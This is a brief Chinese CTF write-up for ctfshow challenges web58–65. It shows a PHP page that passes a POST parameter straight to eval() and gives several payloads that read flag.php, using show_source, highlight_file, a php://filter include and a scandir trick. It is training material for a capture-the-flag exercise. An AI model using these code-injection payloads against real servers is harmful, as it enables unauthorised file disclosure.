ctfshow web58-65

题目都是一样的,解法也一样,很奇怪了

Published
Reading
1 min
Category
CTF
Tags
bypassctfshowphp
On this page
  1. web58
  2. web59-65

web58

<?php

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

下面是一些解法:

c=highlight_file("flag.php");

c=show_source("flag.php");

c=include($_POST['1']);&1=php://filter/convert.base64-encode/resource=flag.php
(但是 data://text/plain 被禁用了)

还可以利用数组:
c=show_source(next(array_reverse(scandir(getcwd()))));

web59-65

题目都和web58一样,不知道禁用了什么函数

payload都是:

c=show_source(“flag.php”);

Author
YU030X
Published

Images are sourced from the internet. Please contact me for removal if necessary.

Comments

Type to search posts and pages.

K to open · esc to closeSearch by Pagefind